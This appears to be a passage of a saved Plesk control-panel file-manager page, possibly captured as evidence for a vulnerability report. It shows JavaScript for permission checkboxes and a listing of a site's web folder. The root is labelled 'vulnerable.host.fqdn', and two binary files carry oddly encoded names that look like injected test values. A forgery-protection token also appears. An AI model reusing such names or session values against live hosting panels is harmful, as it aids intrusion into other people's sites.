                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["wd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "wa":
                   if (el["wa_perm[" + id + "]"].checked) {
                       el["wd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "wd":
                   if (el["wd_perm[" + id + "]"].checked) {
                       el["wa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "xa":
                   if (el["xa_perm[" + id + "]"].checked) {
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["wa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "xd":
                   if (el["xd_perm[" + id + "]"].checked) {
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["wd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "fa":
                   if (el["fa_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = true;
                       el["wa_perm[" + id + "]"].checked = true;
                       el["xa_perm[" + id + "]"].checked = true;
                       el["rd_perm[" + id + "]"].checked = false;
                       el["wd_perm[" + id + "]"].checked = false;
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                   }
                   break;
               case "fd":
                   if (el["fd_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = true;
                       el["wd_perm[" + id + "]"].checked = true;
                       el["xd_perm[" + id + "]"].checked = true;
                       el["ra_perm[" + id + "]"].checked = false;
                       el["wa_perm[" + id + "]"].checked = false;
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                   }
                   break;

               }
           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/edit/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   


<div class="toolsArea">
   <fieldset>
       <legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <div class="screenButtons">
           <DIV class="commonButton" id="bid-create-dir" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_dir_oC();return false;" style=""><BUTTON name="bname_create_dir" id="buttonid-create-dir" type="button" onClick="Event.stop(event);new_dir_oC();return false;">Add New Directory</BUTTON><SPAN id="spanid-create-dir">Add New Directory</SPAN></DIV>
           <DIV class="commonButton" id="bid-create-file" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Create a new file.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);new_file_oC();return false;" style=""><BUTTON name="bname_create_file" id="buttonid-create-file" type="button" onClick="Event.stop(event);new_file_oC();return false;">Add New File</BUTTON><SPAN id="spanid-create-file">Add New File</SPAN></DIV>
       </div>
       
   </td></tr></table></fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Files</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       
       <script>
           function a(event) { tooltip.set(event, [{"type":"string","string":"Edit the file."}]); }
           function b(event) { tooltip.set(event, [{"type":"string","string":"View the file."}]); }
           function c(event) { tooltip.set(event, [{"type":"string","string":"i_filemanager__chdir"}]); }
           function d(event) { tooltip.set(event, [{"type":"string","string":"Change access rights to the file or directory."}]); }
           function e(event) { tooltip.set(event, [{"type":"string","string":"Change the file or directory name."}]); }
           function f(event, type) {
               switch (type) {
                   case "pdir":
                       tooltip.set(event, [{"type":"string","string":"Go to the directory one level up."}]);
                       break;
                   case "dir":
                       tooltip.set(event, [{"type":"string","string":"Go inside the directory."}]);
                       break;
                   case "text":
                       tooltip.set(event, [{"type":"string","string":"View the text file contents."}]);
                       break;
                   case "image":
                       tooltip.set(event, [{"type":"string","string":"View the image."}]);
                       break;
                   case "audio":
                       tooltip.set(event, [{"type":"string","string":"Audio file."}]);
                       break;
                   case "security":
                       tooltip.set(event, [{"type":"string","string":"Apache security file."}]);
                       break;
                   case "webscript":
                       tooltip.set(event, [{"type":"string","string":"Webscript page file."}]);
                       break;
                   case "wappage":
                       tooltip.set(event, [{"type":"string","string":"WAP page file."}]);
                       break;
                   case "webpage":
                       tooltip.set(event, [{"type":"string","string":"Web page file."}]);
                       break;
                   case "compressed":
                       tooltip.set(event, [{"type":"string","string":"Compressed file."}]);
                       break;
                   case "unknown_text":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (text data)."}]);
                       break;
                   case "unknown_binary":
                       tooltip.set(event, [{"type":"string","string":"Unknown file type (binary data)."}]);
                       break;
               }
           }
           function g(event) { tooltip.set(event, [{"type":"string","string":"Edit the file in a visual editor."}]); }
           function h(event) { tooltip.set(event, [{"type":"string","string":"Editing the file in a visual editor requires Internet Explorer version 5.5 or later."}]); }
           function i(event) { tooltip.set(event, [{"type":"string","string":"Open the file in a browser."}]); }
           function download_hint(event) { tooltip.set(event, [{"type":"string","string":"Download the file."}]); }
           function z() { tooltip.hide(); }

           function bin() { return confirm("This file may be a binary file. Do you want to open it?"); }
       </script>
       <div id="FileListSearch" class="actions-box show"><table width="100%" cellspacing="0" class="buttons"><tr><td class="main"><div><DIV class="commonButton" id="bid-remove-selected" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Delete the selected files or directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);remove_oC();return false;" style=""><BUTTON name="bname_remove_selected" id="buttonid-remove-selected" type="button" onClick="Event.stop(event);remove_oC();return false;">Remove</BUTTON><SPAN id="spanid-remove-selected">Remove</SPAN></DIV><DIV class="commonButton" id="bid-touch" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to change the timestamp.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);touch_oC();return false;" style=""><BUTTON name="bname_touch" id="buttonid-touch" type="button" onClick="Event.stop(event);touch_oC();return false;">Change Timestamp</BUTTON><SPAN id="spanid-touch">Change Timestamp</SPAN></DIV><DIV class="commonButton" id="bid-copy-move" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Select one or several files or directories and click to copy or move to another directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);copy_move_oC();return false;" style=""><BUTTON name="bname_copy_move" id="buttonid-copy-move" type="button" onClick="Event.stop(event);copy_move_oC();return false;">Copy/Move</BUTTON><SPAN id="spanid-copy-move">Copy/Move</SPAN></DIV><DIV class="commonButton" id="bid-count-size" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Calculate the total size of selected files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);count_size_oC();return false;" style=""><BUTTON name="bname_count_size" id="buttonid-count-size" type="button" onClick="Event.stop(event);count_size_oC();return false;">Calculate Size</BUTTON><SPAN id="spanid-count-size">Calculate Size</SPAN></DIV><DIV class="commonButton" id="bid-extract-archive" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Extract files from the selected archives into the current directory. Note that the file names may be displayed improperly after the extraction if they contain national characters.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);extract_oC();return false;" style=""><BUTTON name="bname_extract_archive" id="buttonid-extract-archive" type="button" onClick="Event.stop(event);extract_oC();return false;">Extract Files</BUTTON><SPAN id="spanid-extract-archive">Extract Files</SPAN></DIV></div></td><td class="misc"><div id="FileListSearchControl" class="show"><DIV class="commonButton" id="bid-search-show" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to show search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchShow();;return false;" style=""><BUTTON name="bname_search_show" id="buttonid-search-show" type="button" onClick="Event.stop(event);FileListSearchShow();;return false;">Show Search</BUTTON><SPAN id="spanid-search-show">Show Search</SPAN></DIV><DIV class="commonButton" id="bid-search-hide" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListSearchHide();;return false;" style=""><BUTTON name="bname_search_hide" id="buttonid-search-hide" type="button" onClick="Event.stop(event);FileListSearchHide();;return false;">Hide Search</BUTTON><SPAN id="spanid-search-hide">Hide Search</SPAN></DIV></div></td></tr></table><table width="100%" cellspacing="0" class="searchArea buttons"><tr><td class="main"><div><TABLE cellspacing="0" class="searchSimple"><TR><TD><input type="text" name="filter" id="searchInput" value="" size="20" maxlength="245"></TD><TD><DIV class="commonButton" id="bid-search" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter a search pattern and click to find files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;" style=""><BUTTON name="bname_search" id="buttonid-search" type="submit" onClick="Event.stop(event);FileListFilter(document.forms[0]);return false;">Search</BUTTON><SPAN id="spanid-search">Search</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-show-all" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Show all files and directories.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;" style=""><BUTTON name="bname_show_all" id="buttonid-show-all" type="button" onClick="Event.stop(event);FileListShowAll(document.forms[0]);return false;">Reset Search</BUTTON><SPAN id="spanid-show-all">Reset Search</SPAN></DIV></TD></TR></TABLE></div></td></tr></table></div><div class="paging pagingTop"><input type="hidden" name="page" value ="0"><input type="hidden" name="page_size" value ="25"><table width="100%"><tr><td>1-25 <A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items of 44 total</td><td align="center">Pages:&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">First</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">&lt;&lt;</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">1</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">2</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">&gt;&gt;</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">Last</a></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><input type="hidden" name="sort" value="name"><table width="100%" cellspacing="0" class="list"><TR><th width="0" class="select"><input type="checkbox" class="checkbox" name="FileListSelectAll" value="true" onClick="FileListSelect()"></th><th class="icon"><A href="#" onClick="FileListSort(&#039;type&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by type.&quot;&#125;]);" onMouseOut="tooltip.hide();">T</a></th><th width="65%" class="sort"><A href="#" onClick="FileListSort(&#039;name_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by name.&quot;&#125;]);" onMouseOut="tooltip.hide();">Name</a><img src="/skins/default/plesk/icons/arrow_up.gif"></th><th width="15%" class="number"><A href="#" onClick="FileListSort(&#039;size&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by size.&quot;&#125;]);" onMouseOut="tooltip.hide();">Size</a></th><th width="20%" class="number"><A href="#" onClick="FileListSort(&#039;ch_date&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort files and directories by modification date.&quot;&#125;]);" onMouseOut="tooltip.hide();">Modification date</a></th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th><th>&nbsp;</th></TR><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td>&nbsp;</td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();" onMouseOver="f(event, &#039;pdir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_pdir.gif" width="16" height="16" alt="file_pdir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2F" onClick=";lon();">..</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 03:11 PM</td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_App_Data" value="App_Data" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2FApp_Data%2F" onClick=";lon();">App_Data</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/App_Data" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=App_Data" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2FApp_Data" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_css" value="css" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fcss%2F" onClick=";lon();">css</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/css" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=css" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fcss" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_img" value="img" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fimg%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fimg%2F" onClick=";lon();">img</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/img" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=img" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fimg" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_picture_library" value="picture_library" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fpicture_library%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Fpicture_library%2F" onClick=";lon();">picture_library</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/picture_library" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=picture_library" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Fpicture_library" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_test" value="test" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Ftest%2F" onClick=";lon();" onMouseOver="f(event, &#039;dir&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_dir.gif" width="16" height="16" alt="file_dir.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&amp;file=%2Fhttpdocs%2Ftest%2F" onClick=";lon();">test</a></td><td class="number">&nbsp;</td><td class="number">May 23, 2011 08:43 AM</td><td><A href="http://nosedivesailing.com/test" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_dir&amp;file=test" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename directory "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2Ftest" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for directory "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><IMG src="/skins/default/plesk/icons/empty_icon.gif" width="16" height="16" alt="empty_icon.gif" title=""></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_%20a%3db%200fd28a9909b" value="%20a%3db%200fd28a9909b" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=%2520a%253db%25200fd28a9909b" onClick="return bin();;lon();">%20a%3db%200fd28a9909b</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/%20a%3db%200fd28a9909b" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=%2520a%253db%25200fd28a9909b" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F%2520a%253db%25200fd28a9909b" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=%2520a%253db%25200fd28a9909b" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_%20a%3db%202d0878db96d" value="%20a%3db%202d0878db96d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=%2520a%253db%25202d0878db96d" onClick="return bin();;lon();">%20a%3db%202d0878db96d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/%20a%3db%202d0878db96d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=%2520a%253db%25202d0878db96d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F%2520a%253db%25202d0878db96d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=%2520a%253db%25202d0878db96d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr 